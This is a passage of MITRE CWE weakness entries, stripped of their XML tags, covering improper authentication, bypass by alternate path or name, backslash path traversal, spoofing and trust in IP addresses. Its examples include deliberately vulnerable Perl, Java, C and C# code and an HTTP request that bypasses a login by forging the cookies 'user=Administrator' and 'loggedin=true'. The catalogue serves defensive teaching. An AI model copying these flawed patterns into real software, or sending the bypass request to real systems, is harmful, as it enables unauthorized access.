technique that detects the absence of authentication may report false positives. + + Limited + + + Manual Static Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Manual static analysis is useful for evaluating the correctness of custom authentication mechanisms. + + High + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + + + High + + + + + Architecture and Design + Libraries or Frameworks + Use an authentication framework or library such as the OWASP ESAPI Authentication feature. + + + + + The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to "remember" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the "Administrator" username, as recorded in the user cookie. + + my $q = new CGI; + if ($q->cookie('loggedin') ne "true") { + if (! AuthenticateUser($q->param('username'), $q->param('password'))) {ExitError("Error: you need to log in first");}else { + # Set loggedin and user cookies.$q->cookie(-name => 'loggedin',-value => 'true'); + $q->cookie(-name => 'user',-value => $q->param('username')); + + } + } + if ($q->cookie('user') eq "Administrator") {DoAdministratorTasks();} + + Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as: + + GET /cgi-bin/vulnerable.cgi HTTP/1.1Cookie: user=AdministratorCookie: loggedin=true + [body of request] + + By setting the loggedin cookie to "true", the attacker bypasses the entire authentication check. By using the "Administrator" value in the user cookie, the attacker also gains privileges to administer the software. + + + In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts [REF-236]. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts. + + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors did not use any authentication or used client-side authentication for critical functionality in their OT products. + + + + + CVE-2022-36436 + Python-based authentication proxy does not enforce password authentication during the initial handshake, allowing the client to bypass authentication by specifying a 'None' authentication type. + https://www.cve.org/CVERecord?id=CVE-2022-36436 + + + CVE-2022-30034 + Chain: Web UI for a Python RPC framework does not use regex anchors to validate user login emails (CWE-777), potentially allowing bypass of OAuth (CWE-1390). + https://www.cve.org/CVERecord?id=CVE-2022-30034 + + + CVE-2022-29951 + TCP-based protocol in Programmable Logic Controller (PLC) has no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-29951 + + + CVE-2022-29952 + Condition Monitor uses a protocol that does not require authentication. + https://www.cve.org/CVERecord?id=CVE-2022-29952 + + + CVE-2022-30313 + Safety Instrumented System uses proprietary TCP protocols with no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-30313 + + + CVE-2022-30317 + Distributed Control System (DCS) uses a protocol that has no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-30317 + + + CVE-2022-33139 + SCADA system only uses client-side authentication, allowing adversaries to impersonate other users. + https://www.cve.org/CVERecord?id=CVE-2022-33139 + + + CVE-2021-3116 + Chain: Python-based HTTP Proxy server uses the wrong boolean operators (CWE-480) causing an incorrect comparison (CWE-697) that identifies an authN failure if all three conditions are met instead of only one, allowing bypass of the proxy authentication (CWE-1390) + https://www.cve.org/CVERecord?id=CVE-2021-3116 + + + CVE-2021-21972 + Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21972 + + + CVE-2021-37415 + IT management product does not perform authentication for some REST API requests, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-37415 + + + CVE-2020-13927 + Default setting in workflow management product allows all API requests without authentication, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-13927 + + + CVE-2021-35395 + Stack-based buffer overflows in SFK for wifi chipset used for IoT/embedded devices, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-35395 + + + CVE-2021-34523 + Mail server does not properly check an access token before executing a Powershell command, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-34523 + + + CVE-2020-12812 + Chain: user is not prompted for a second authentication factor (CWE-287) when changing the case of their username (CWE-178), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-12812 + + + CVE-2020-10148 + Authentication bypass by appending specific parameters and values to a URI, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-10148 + + + CVE-2020-0688 + Mail server does not generate a unique key during installation, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-0688 + + + CVE-2017-14623 + LDAP Go package allows authentication bypass using an empty password, causing an unauthenticated LDAP bind + https://www.cve.org/CVERecord?id=CVE-2017-14623 + + + CVE-2009-3421 + login script for guestbook allows bypassing authentication by setting a "login_ok" parameter to 1. + https://www.cve.org/CVERecord?id=CVE-2009-3421 + + + CVE-2009-2382 + admin script allows authentication bypass by setting a cookie value to "LOGGEDIN". + https://www.cve.org/CVERecord?id=CVE-2009-2382 + + + CVE-2009-1048 + VOIP product allows authentication bypass using 127.0.0.1 in the Host header. + https://www.cve.org/CVERecord?id=CVE-2009-1048 + + + CVE-2009-2213 + product uses default "Allow" action, instead of default deny, leading to authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2009-2213 + + + CVE-2009-2168 + chain: redirect without exit (CWE-698) leads to resultant authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2009-2168 + + + CVE-2009-3107 + product does not restrict access to a listening port for a critical service, allowing authentication to be bypassed. + https://www.cve.org/CVERecord?id=CVE-2009-3107 + + + CVE-2009-1596 + product does not properly implement a security-related configuration setting, allowing authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2009-1596 + + + CVE-2009-2422 + authentication routine returns "nil" instead of "false" in some situations, allowing authentication bypass using an invalid username. + https://www.cve.org/CVERecord?id=CVE-2009-2422 + + + CVE-2009-3232 + authentication update script does not properly handle when admin does not select any authentication modules, allowing authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2009-3232 + + + CVE-2009-3231 + use of LDAP authentication with anonymous binds causes empty password to result in successful authentication + https://www.cve.org/CVERecord?id=CVE-2009-3231 + + + CVE-2005-3435 + product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. + https://www.cve.org/CVERecord?id=CVE-2005-3435 + + + CVE-2005-0408 + chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2005-0408 + + + + Authentication + + + + Authentication Error + + + A7 + Broken Authentication and Session Management + CWE More Specific + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + 1 + Insufficient Authentication + + + Part 3-3 + Req SR 1.1 + + + Part 3-3 + Req SR 1.2 + + + Part 4-2 + Req CR 1.1 + + + Part 4-2 + Req CR 1.2 + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + This CWE entry might be misused when lower-level CWE entries are likely to be applicable. It is a level-1 Class (i.e., a child of a Pillar). + Consider children or descendants, beginning with CWE-1390: Weak Authentication or CWE-306: Missing Authentication for Critical Function. + + + + + + + + + + This can be resultant from SQL injection vulnerabilities and other issues. + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2009-01-12 + updated Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Observed_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Observed_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Authentication Issues + Insufficient Authentication + + + + A product requires authentication, but the product has an alternate path or channel that does not require authentication. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Architecture and Design + This is often seen in web applications that assume that access to a particular CGI program can only be obtained through a "front" screen, when the supporting programs are directly accessible. But this problem is not just in web apps. + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource. + + + + + CVE-2000-1179 + Router allows remote attackers to read system logs without authentication by directly connecting to the login screen and typing certain control characters. + https://www.cve.org/CVERecord?id=CVE-2000-1179 + + + CVE-1999-1454 + Attackers with physical access to the machine may bypass the password prompt by pressing the ESC (Escape) key. + https://www.cve.org/CVERecord?id=CVE-1999-1454 + + + CVE-1999-1077 + OS allows local attackers to bypass the password protection of idled sessions via the programmer's switch or CMD-PWR keyboard sequence, which brings up a debugger that the attacker can use to disable the lock. + https://www.cve.org/CVERecord?id=CVE-1999-1077 + + + CVE-2003-0304 + Direct request of installation file allows attacker to create administrator accounts. + https://www.cve.org/CVERecord?id=CVE-2003-0304 + + + CVE-2002-0870 + Attackers may gain additional privileges by directly requesting the web management URL. + https://www.cve.org/CVERecord?id=CVE-2002-0870 + + + CVE-2002-0066 + Bypass authentication via direct request to named pipe. + https://www.cve.org/CVERecord?id=CVE-2002-0066 + + + CVE-2003-1035 + User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing. + https://www.cve.org/CVERecord?id=CVE-2003-1035 + + + + + Authentication Bypass by Alternate Path/Channel + + + A10 + Failure to Restrict URL Access + CWE More Specific + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + overlaps Unprotected Alternate Channel + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Modes_of_Introduction, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Authentication Bypass by Alternate Path/Channel + + + + The product performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor. + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2003-0317 + Protection mechanism that restricts URL access can be bypassed using URL encoding. + https://www.cve.org/CVERecord?id=CVE-2003-0317 + + + CVE-2004-0847 + Bypass of authentication for files using "\" (backslash) or "%5C" (encoded backslash). + https://www.cve.org/CVERecord?id=CVE-2004-0847 + + + + + Authentication bypass by alternate name + + + IDS01-J + Normalize strings before validating them + CWE More Specific + + + IDS01-J + Normalize strings before validating them + CWE More Specific + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps equivalent encodings, canonicalization, authorization, multiple trailing slash, trailing space, mixed case, and other equivalence issues. + Alternate names are useful in data driven manipulation attacks, not just for authentication. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes, Potential_Mitigations, Theoretical_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\..\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + This is similar to CWE-25, except using "\" instead of "/". Sometimes a program checks for "..\" at the beginning of the input, so a "\..\" can bypass that check. It is also useful for bypassing path traversal protection schemes that only assume that the "/" separator is valid. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-1987 + Protection mechanism checks for "/.." but doesn't account for Windows-specific "\.." allowing read of arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2002-1987 + + + CVE-2005-2142 + Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a "\.." sequence in an LS command. + https://www.cve.org/CVERecord?id=CVE-2005-2142 + + + + + '\..\filename' ('leading dot dot backslash') + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms, Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Leading Dot Dot Backslash - '\..\filename' + + + + This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks. + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + This weakness can allow an attacker to access resources which are not otherwise accessible without proper authentication. + + + + + The following code authenticates users. + + String sourceIP = request.getRemoteAddr();if (sourceIP != null && sourceIP.equals(APPROVED_IP)) {authenticated = true;} + + The authentication mechanism implemented relies on an IP address for source validation. If an attacker is able to spoof the IP, they may be able to bypass the authentication mechanism. + + + Both of these examples check if a request is from a trusted address before responding to the request. + + sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv)); + while (1) {memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);}} + + + while(true) { + DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort(); + if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) {out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);} + } + + The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client. + + + The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. + + struct hostent *hp;struct in_addr myaddr;char* tHost = "trustme.example.com";myaddr.s_addr=inet_addr(ip_addr_string); + hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {trusted = true;} else {trusted = false;} + + + String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith("trustme.com")) {trusted = true;} + + + IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith("trustme.com")) {trusted = true;} + + IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. + + + + + CVE-2009-1048 + VOIP product allows authentication bypass using 127.0.0.1 in the Host header. + https://www.cve.org/CVERecord?id=CVE-2009-1048 + + + + + Authentication bypass by spoofing + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be resultant from insufficient verification. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an IP address for authentication. + IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. + + + + + + + + Resultant + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + High + + + Access Control + Non-Repudiation + Hide Activities + Gain Privileges or Assume Identity + Malicious users can fake authentication information, impersonating any IP address. + + + + + Architecture and Design + Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate. + + + + + Both of these examples check if a request is from a trusted address before responding to the request. + + sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv)); + while (1) {memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);}} + + + while(true) { + DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort(); + if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) {out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);} + } + + The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client. + + + + + Trusting self-reported IP address + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + 